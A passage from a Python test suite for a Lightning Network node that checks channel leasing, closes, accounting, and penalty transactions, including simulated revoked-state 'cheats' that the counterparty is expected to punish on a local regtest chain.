'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# sink the funding transaction
bitcoind.generate_block(1, wait_for_mempool=1)
# stop l1
l1.stop()
# advance blockchain 1008 blocks, the lessor should drop to chain
bitcoind.generate_block(1008)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_log('Offline peer is too far behind, terminating')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.developer("requres 'dev-queryrates'")
@pytest.mark.slow_test
def test_channel_lease_post_expiry(node_factory, bitcoind, chainparams):
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'plugin': coin_mvt_plugin}
l1, l2, = node_factory.get_nodes(2, opts=opts)
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
# l1 leases a channel from l2
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
channel_id = first_channel_id(l1, l2)
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
# l2 attempts to close a channel that it leased, should fail
with pytest.raises(RpcError, match=r'Peer leased this channel from us'):
l2.rpc.close(l1.get_channel_scid(l2))
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 115')
# We need to give l1-l2 time to update their blockheights
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(32)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
# l1<->l2 mutual close should work
chan = l1.get_channel_scid(l2)
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.rpc.close(chan)
l2.daemon.wait_for_log('State changed from CLOSINGD_SIGEXCHANGE to CLOSINGD_COMPLETE')
bitcoind.generate_block(2)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
l2.daemon.wait_for_log('Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
channel_mvts_1 = [
{'type': 'chain_mvt', 'credit': 506432000, 'debit': 0, 'tags': ['channel_open', 'opener', 'leased']},
{'type': 'channel_mvt', 'credit': 0, 'debit': 6432000, 'tags': ['lease_fee'], 'fees': '0msat'},
{'type': 'channel_mvt', 'credit': 0, 'debit': 10000, 'tags': ['invoice'], 'fees': '0msat'},
{'type': 'chain_mvt', 'credit': 0, 'debit': 499990000, 'tags': ['channel_close']},
]
channel_mvts_2 = [
{'type': 'chain_mvt', 'credit': 500000000, 'debit': 0, 'tags': ['channel_open', 'leased']},
{'type': 'channel_mvt', 'credit': 6432000, 'debit': 0, 'tags': ['lease_fee'], 'fees': '0msat'},
{'type': 'channel_mvt', 'credit': 10000, 'debit': 0, 'tags': ['invoice'], 'fees': '0msat'},
{'type': 'chain_mvt', 'credit': 0, 'debit': 506442000, 'tags': ['channel_close']},
]
check_coin_moves(l1, channel_id, channel_mvts_1, chainparams)
check_coin_moves(l2, channel_id, channel_mvts_2, chainparams)
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_unilat_closes(node_factory, bitcoind):
'''
Check that channel leases work
l1-l2: l1 leases funds from l2; l1 goes to chain unilaterally
l2-l3: l2 leases funds from l3; l3 goes to chain unilaterally
'''
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'funder-lease-requests-only': False}
l1, l2, l3 = node_factory.get_nodes(3, opts=opts)
# Allow l2 some warnings
l2.allow_warning = True
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l3.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# l2 leases a channel from l3
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
rates = l2.rpc.dev_queryrates(l3.info['id'], amount, amount)
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers']) == 0)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.rpc.fundchannel(l3.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate), minconf=0,
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
l3.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l3.rpc.listchannels(l3.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
inv = l2.rpc.invoice(10**4, '3', 'no_3')
l3.rpc.pay(inv['bolt11'])
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2, l3])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 110')
l2.stop()
# unilateral close channels l1<->l2 & l3<->l2
l1.rpc.close(l2.info['id'], 1)
l3.rpc.close(l2.info['id'], 1, force_lease_closed=True)
# Wait til to_self_delay expires, l1 should claim to_local back
bitcoind.generate_block(10, wait_for_mempool=2)
l1.daemon.wait_for_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
bitcoind.generate_block(1, wait_for_mempool=1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal OUR_DELAYED_RETURN_TO_WALLET')
assert len(l1.rpc.listfunds()['outputs']) == 2
l2.start()
search_start = l2.daemon.logsearch_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 40.*')
utxo1 = re.match('.* adding utxo to watch (.*), csv .*', log).group(1)
l2.daemon.logsearch_start = search_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 1')
utxo3 = re.match('.* adding utxo to watch (.*), csv 1', log).group(1)
# we *shouldn't* be able to spend it, there's a lock on it
with pytest.raises(RpcError, match='UTXO .* is csv locked'):
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# we *can* spend the 1-csv-locked one
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo3])
# This can timeout, so do it in four easy stages.
for i in range(4):
bitcoind.generate_block(4032 // 4)
sync_blockheight(bitcoind, [l2, l3])
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# l3 cleans up their to-self after their lease expires
assert l3.daemon.is_in_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessor_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessee can recover funds if lessor cheats
'''
balance_snaps = os.path.join(os.getcwd(), 'tests/plugins/balance_snaps.py')
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_warning': True,
'plugin': balance_snaps},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True,
'plugin': balance_snaps}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start(wait_for_bitcoind_sync=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
sync_blockheight(bitcoind, [l2])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l1.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l1 while l1 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l1.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l1.start()
sync_blockheight(bitcoind, [l1])
l1.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l2.daemon.wait_for_log('Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessee_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessor can recover funds if lessee cheats
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l1
l1.stop()
l1_db_path = os.path.join(l1.daemon.thor_dir, chainparams['name'], 'thord.sqlite3')
l1_db_path_bak = os.path.join(l1.daemon.thor_dir, chainparams['name'], 'thord.sqlite3.bak')
copyfile(l1_db_path, l1_db_path_bak)
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
sync_blockheight(bitcoind, [l1])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l1's database
l1.stop()
l2.stop()
copyfile(l1_db_path_bak, l1_db_path)
# start l1 and force close channel with l2 while l2 is still offline
l1.start()
sync_blockheight(bitcoind, [l1])
l1.rpc.close(l2.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l2.start()
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l1 sees that l2 has spent their coins!
l1.daemon.wait_for_logs(['Grinding for to_remote',
'Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by'])
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_fulfill(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts their htlc fulfill tx
l3 comes back online, sees l2's cheat. takes funds from htlc fulfill tx.
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
balance_snaps = os.path.join(os.getcwd(), 'tests/plugins/balance_snaps.py')
l1, l2, l3, l4 = node_factory.line_graph(4,
opts=[{'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None},
{'plugin': [coin_mvt_plugin, balance_snaps],
'disable-mpp': None,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'plugin': [coin_mvt_plugin, balance_snaps],
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'dev-no-reconnect': None,
'may_reconnect': True}],
wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that l1 + l4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
l1.rpc.waitsendpay(inv['payment_hash'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
l2.rpc.waitsendpay(inv['payment_hash'])
# now we send one 'sticky' htlc: l4->l1
amt = 10**8 // 2
sticky_inv = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv['payment_hash'], payment_secret=sticky_inv['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
# l2 moves on after force-closing the channel with l3
bitcoind.generate_block(1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX'])
l3.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
bitcoind.generate_block(1)
l3.daemon.wait_for_log('Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
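    # Each key below labels a tx ('A' is the channel open); each value lists
    # the outputs we expect that tx to create, roughly as
    # (account, tags when the output is created, tags when it is spent,
    #  label of the tx that spends it) -- the shape check_utxos_channel
    # appears to expect.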
expected_2 = {
'A': [('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('external', ['penalized'], None, None)],
'C': [('external', ['penalized'], None, None)],
}
expected_3 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['channel_close'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'E')],
'C': [('cid1', ['penalty'], ['to_wallet'], 'D')],
'D': [('wallet', ['deposit'], None, None)],
'E': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_3['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
expected_3['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l2, [channel_id], expected_2, filter_channel=channel_id)
check_utxos_channel(l3, [channel_id], expected_3, tags, filter_channel=channel_id)
if not chainparams['elements']:
# Also check snapshots
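        # Each entry is the snapshot the balance_snaps plugin should have
        # recorded at that blockheight (presumably one balance per account
        # l2 knows about at the time).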
expected_bals_2 = [
{'blockheight': 101, 'accounts': [{'balance': '0msat'}]},
{'blockheight': 108, 'accounts': [{'balance': '995433000msat'}, {'balance': '500000000msat'}, {'balance': '499994999msat'}]},
# There's a duplicate because we stop and restart l2 twice
# (both times at block 108)
{'blockheight': 108, 'accounts': [{'balance': '995433000msat'}, {'balance': '500000000msat'}, {'balance': '499994999msat'}]},
]
check_balance_snaps(l2, expected_bals_2)
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_timeout(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
^---> l5
l1 pushes money to l5, who doesn't fulfill (freezing htlc across l2-l3)
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts the timeout htlc_tx + fulfill htlc_tx
both of which have a delay. l2 goes ahead and 'steals back' their
output + the htlc they fulfill
l3 comes back online, sees l2's cheat. takes funds from htlc timeout tx
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2, l3, l4, l5 = node_factory.get_nodes(
5,
opts=[
{
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'dev-no-reconnect': None,
}, {
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
'allow_broken_log': True,
}
]
)
node_factory.join_nodes([l1, l2, l3, l4], wait_for_announce=True)
node_factory.join_nodes([l3, l5], wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
    # push some money so that l1 and l4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
# now we send two 'sticky' htlcs, l1->l5 + l4->l1
amt = 10**8 // 2
sticky_inv_1 = l5.rpc.invoice(amt, '2', 'sticky')
route = l1.rpc.getroute(l5.info['id'], amt, 1)['route']
l1.rpc.sendpay(route, sticky_inv_1['payment_hash'], payment_secret=sticky_inv_1['payment_secret'])
l5.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
sticky_inv_2 = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv_2['payment_hash'], payment_secret=sticky_inv_2['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 2)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.thor_dir, chainparams['name'], 'thord.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
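    # As above: restoring this snapshot later turns l2's force close into a
    # revoked ('cheat') commitment from l3's perspective.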
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
    # start l2 (now rolled back a bit) and force close the channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
# l2 moves on for closed l3
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 16 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
    # after 5 blocks, l2 reclaims both the commitment's DELAYED_OUTPUT_TO_US and the HTLC-success tx's delayed output
bitcoind.generate_block(5, wait_for_mempool=0)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US',
'Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_UNILATERAL/DELAYED_OUTPUT_TO_US'])
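    # (wait_for_mempool=2 below makes sure both sweep txs above have reached
    # the mempool before the next blocks are mined)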
bitcoind.generate_block(10, wait_for_mempool=2)
l2.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
